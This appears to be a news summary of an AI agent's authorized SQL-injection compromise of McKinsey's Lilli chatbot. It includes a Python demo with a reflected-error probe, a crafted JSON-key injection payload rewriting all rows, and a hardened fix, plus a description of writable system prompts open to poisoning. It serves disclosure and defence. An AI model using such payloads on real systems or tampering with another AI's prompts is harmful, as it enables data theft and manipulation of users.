AI Agent Exploits SQL Injection to Compromise McKinsey's Lilli Chatbot

Attack Details and Impact
CodeWall's AI agent targeted McKinsey's generative AI platform Lilli, which processes over 500,000 prompts monthly and is used by 72% of McKinsey's employees (approximately 40,000 people). The agent operated fully autonomously from target research through attack execution and reporting, without any credentials or human input during the process.
Technical Exploitation
The agent discovered 22 publicly exposed API endpoints that required no authentication. One of them updated stored user search queries by concatenating the request's JSON keys directly into an SQL statement, a SQL injection vulnerability. The agent recognized it when it saw the JSON keys it had sent reflected verbatim in database error messages, a pattern standard security tools would not flag.
The exploitation was straightforward: "No deployment needed. No code change. Just a single UPDATE statement wrapped in a single HTTP call."
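As an added illustration, not code from the original report, from CodeWall or from McKinsey, the following Python sketch reconstructs the bug class described above against an in-memory SQLite database. A hypothetical update handler pastes the caller's JSON keys into the SET clause of an UPDATE; a probe with a bogus key shows that key quoted back in the database error (the signal the agent used); a crafted key then turns the one-row update into an all-rows write with a single statement and a single call; and a hardened handler restricts keys to an allowlist, binds values as parameters, scopes the write to the authenticated caller, and returns a generic error. All table, column and function names, and the sample rows, are assumptions constructed for the example.

```python
import json
import sqlite3

# Constructed sample schema and rows; nothing here comes from the Lilli incident.
SCHEMA = """
CREATE TABLE searches (id INTEGER PRIMARY KEY, user_id INTEGER, query TEXT);
INSERT INTO searches VALUES (1, 42, 'merger synergies');
INSERT INTO searches VALUES (2, 43, 'supply chain risk');
"""

# Constructed request bodies: a recon probe and the injection payload.
PROBE_BODY = '{"not_a_column": "x"}'
INJECTED_BODY = json.dumps({"query = 'poisoned' WHERE 1=1 --": "ignored"})


def fresh_db():
    db = sqlite3.connect(":memory:")
    db.executescript(SCHEMA)
    return db


def queries(db):
    """Return every stored query in id order, to inspect the effect of an update."""
    return [row[0] for row in db.execute("SELECT query FROM searches ORDER BY id")]


def vulnerable_update(db, search_id, body):
    """Hypothetical handler for the bug class in the article: no authentication, and
    the caller's JSON keys are concatenated into the SET clause as column names."""
    fields = json.loads(body)
    assignments = ", ".join(f"{k} = '{v}'" for k, v in fields.items())
    sql = f"UPDATE searches SET {assignments} WHERE id = {int(search_id)}"
    try:
        db.execute(sql)
        db.commit()
        return {"ok": True}
    except sqlite3.Error as exc:
        # Echoing the database error verbatim is what hands the attacker the signal.
        return {"ok": False, "error": str(exc)}


def key_is_reflected(db):
    """Recon step: send a key that cannot be a column and check whether the error
    message quotes it back verbatim. A hit means the key reached the SQL parser
    unquoted, so the key position is injectable."""
    result = vulnerable_update(db, 1, PROBE_BODY)
    return (not result["ok"]) and "not_a_column" in result["error"]


ALLOWED_COLUMNS = {"query"}


def hardened_update(db, caller_user_id, search_id, body):
    """Same operation, fixed: keys must come from an allowlist (identifiers cannot be
    bound as parameters, so they are validated instead), values are bound, the WHERE
    clause is scoped to the authenticated caller, and errors never echo input."""
    fields = json.loads(body)
    if not fields or set(fields) - ALLOWED_COLUMNS:
        return {"ok": False, "error": "unknown field"}
    assignments = ", ".join(f"{k} = ?" for k in fields)
    params = [*fields.values(), int(search_id), int(caller_user_id)]
    cur = db.execute(
        f"UPDATE searches SET {assignments} WHERE id = ? AND user_id = ?", params
    )
    db.commit()
    if cur.rowcount == 0:
        return {"ok": False, "error": "not found"}
    return {"ok": True}


if __name__ == "__main__":
    db = fresh_db()
    print("probe key reflected in error:", key_is_reflected(db))
    print("injection result:", vulnerable_update(db, 1, INJECTED_BODY))
    print("every row rewritten by one UPDATE:", queries(db))
    db = fresh_db()
    print("hardened handler rejects payload:", hardened_update(db, 42, 1, INJECTED_BODY))
    print("rows untouched:", queries(db))
```

The crafted key works because the handler's own trailing `WHERE id = ...` is swallowed by the `--` comment, so the statement stays a single UPDATE while its WHERE clause becomes `1=1`. The same trick applied to a table of system prompts is the mass-poisoning scenario the article describes. The hardened version keeps the dynamic column list (a legitimate need) but treats column names as an allowlist decision rather than as data, because no SQL driver can bind an identifier as a parameter.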
Data Accessed
- 46.5 million chat messages about strategy, mergers and acquisitions, and client engagements (stored in plaintext)
- 728,000 files containing confidential client data
- 57,000 user accounts
- 95 system prompts controlling the AI's behavior (all writable)
Critical Risk
The writable system prompts meant an attacker could have poisoned all responses from Lilli to tens of thousands of consultants, potentially manipulating guardrails, answer generation, and source citations without detection.
Response and Remediation
CodeWall discovered the flaw in late February and disclosed the full attack chain on March 1. By March 2, McKinsey had:
- Patched all unauthenticated endpoints
- Taken the development environment offline
- Blocked public API documentation
McKinsey stated they fixed all issues within hours of notification and found no evidence of unauthorized data access. The company's investigation was supported by a third-party forensics firm.
Broader Implications
This incident demonstrates how AI agents are becoming effective tools for conducting cyberattacks against other AI systems. CodeWall CEO Paul Price noted that while this was a security research exercise, threat actors are increasingly using similar agent technology in real-world attacks, indicating machine-speed intrusions are becoming more common.
📖 Read the full source: HN AI Agents
👀 See Also

Anthropic reveals industrial-scale Claude AI data extraction by Chinese labs
Anthropic confirmed Chinese AI labs used over 24,000 fraudulent accounts to scrape 16 million exchanges from Claude, extracting safety guardrails and logic structures for military and surveillance systems.

Configuring OpenClaw for Encrypted LLM Inference Using TEE Enclaves
A developer shares how they configured OpenClaw to use Onera's AMD SEV-SNP trusted execution environments for end-to-end encrypted LLM inference, including configuration examples and technical tradeoffs.

Sieve: Local Secret Scanner for AI Coding Tool Chat Histories
Sieve scans Cursor, Claude Code, Copilot, and other AI coding assistant chat histories for leaked API keys and tokens. All scanning is local, with redaction and macOS Keychain vault.

Security Checklist for Claude AI-Generated Applications
A developer shares a checklist of common security and operational gaps found in applications built with Claude Code, including rate limiting, authentication flaws, database scaling issues, and input handling vulnerabilities.